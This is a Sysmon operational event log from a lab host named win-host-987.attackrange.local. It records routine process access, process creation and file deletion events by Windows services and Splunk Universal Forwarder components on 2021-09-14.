13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.914{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.913{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931E0DB0F473ED4D89CFE874DF8595B8,SHA256=99877D6FFD4F8DF542F408C8D7D9711D5E34263B6521913BF5505E1184C59F90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30839BB7FE946A943CB4344C61DCD932,SHA256=A4D5012C2A9ADDA88BA56C70ADECD614809D1CC67FA387838BE1D2C337506FBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk 
space 23542300x800000000000000036497851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=015DDB324B7D6FEC05ED8CE29FACCC99,SHA256=15718DDDC8A753803247D3DE9071977FDADBD6440B7AA10E79C6457B3F63DFE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.776{B81B27B7-A16A-6140-9256-04000000C801}27565452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A16A-6140-9256-04000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Sysmon records below, one per line, fields in Sysmon schema order and separated by "; ". Every record is from Channel=Microsoft-Windows-Sysmon/Operational on Computer=win-host-987.attackrange.local with Level=4, Opcode=0, Keywords=0x8000000000000000 and RuleName=-; Task equals EventID; Version is 3 for EventID 10 and 5 for EventID 1, 3 and 23. Rec is the EventRecordID.
Rec=36497845; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:38.613; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497844; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:38.613; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801}; SourceProcessId=420; SourceThreadId=436; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={B81B27B7-A16A-6140-9256-04000000C801}; TargetProcessId=2756; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
Rec=36497843; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:38.613; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; SourceProcessId=2076; SourceThreadId=3760; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetProcessGUID={B81B27B7-A16A-6140-9256-04000000C801}; TargetProcessId=2756; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497842; EventID=1 ProcessCreate; UtcTime=2021-09-14 13:19:38.608; ProcessGuid={B81B27B7-A16A-6140-9256-04000000C801}; ProcessId=2756; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe; FileVersion=-; Description=-; Product=-; Company=-; OriginalFileName=-; CommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2; CurrentDirectory=C:\Windows\system32\; User=NT AUTHORITY\SYSTEM; LogonGuid={B81B27B7-4012-611D-E703-000000000000}; LogonId=0x3e7; TerminalSessionId=0; IntegrityLevel=System; Hashes=MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C; ParentProcessGuid={B81B27B7-4013-611D-2700-00000000C801}; ParentProcessId=2076; ParentImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; ParentCommandLine="C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
Rec=36497841; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:38.176; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational; Hashes=MD5=8456B8E7A2962E22FC2AE659CDC548D6,SHA256=E37B07CAAA3D76D5F0AFE588AC0068F0FA643A780F4B4267ACF298B39EA9BFA0,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497840; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:38.092; SourceProcessGUID={B81B27B7-A169-6140-9156-04000000C801}; SourceProcessId=5888; SourceThreadId=6692; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe; TargetProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; TargetProcessId=2076; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; GrantedAccess=0x101400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497862; EventID=23 FileDelete; UtcTime=2021-09-14 13:19:39.778; ProcessGuid={B81B27B7-4024-611D-7300-00000000C801}; ProcessId=2188; User=NT AUTHORITY\SYSTEM; Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe; TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational; Hashes=MD5=D31314826526BD7D3791E391EBABF78E,SHA256=774EA689F93DFEEFC5CC61BFD219F9B198C326A4392867DACB8E8AC8B1A7BC85,IMPHASH=00000000000000000000000000000000; IsExecutable=false; Archived=false - insufficient disk space
Rec=36497861; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.314; SourceProcessGUID={B81B27B7-4014-611D-3000-00000000C801}; SourceProcessId=3144; SourceThreadId=3164; SourceImage=C:\Windows\system32\conhost.exe; TargetProcessGUID={B81B27B7-A16B-6140-9356-04000000C801}; TargetProcessId=2816; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497860; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.312; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497859; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.312; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497858; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.312; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497857; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.312; SourceProcessGUID={B81B27B7-4012-611D-0C00-00000000C801}; SourceProcessId=732; SourceThreadId=4464; SourceImage=C:\Windows\system32\svchost.exe; TargetProcessGUID={B81B27B7-4013-611D-2500-00000000C801}; TargetProcessId=1820; TargetImage=C:\Windows\sysmon64.exe; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
Rec=36497856; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.311; SourceProcessGUID={B81B27B7-4012-611D-0500-00000000C801}; SourceProcessId=420; SourceThreadId=436; SourceImage=C:\Windows\system32\csrss.exe; TargetProcessGUID={B81B27B7-A16B-6140-9356-04000000C801}; TargetProcessId=2816; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
Rec=36497855; EventID=10 ProcessAccess; UtcTime=2021-09-14 13:19:39.311; SourceProcessGUID={B81B27B7-4013-611D-2700-00000000C801}; SourceProcessId=2076; SourceThreadId=3760; SourceImage=C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe; TargetProcessGUID={B81B27B7-A16B-6140-9356-04000000C801}; TargetProcessId=2816; TargetImage=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe; GrantedAccess=0x1fffff; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
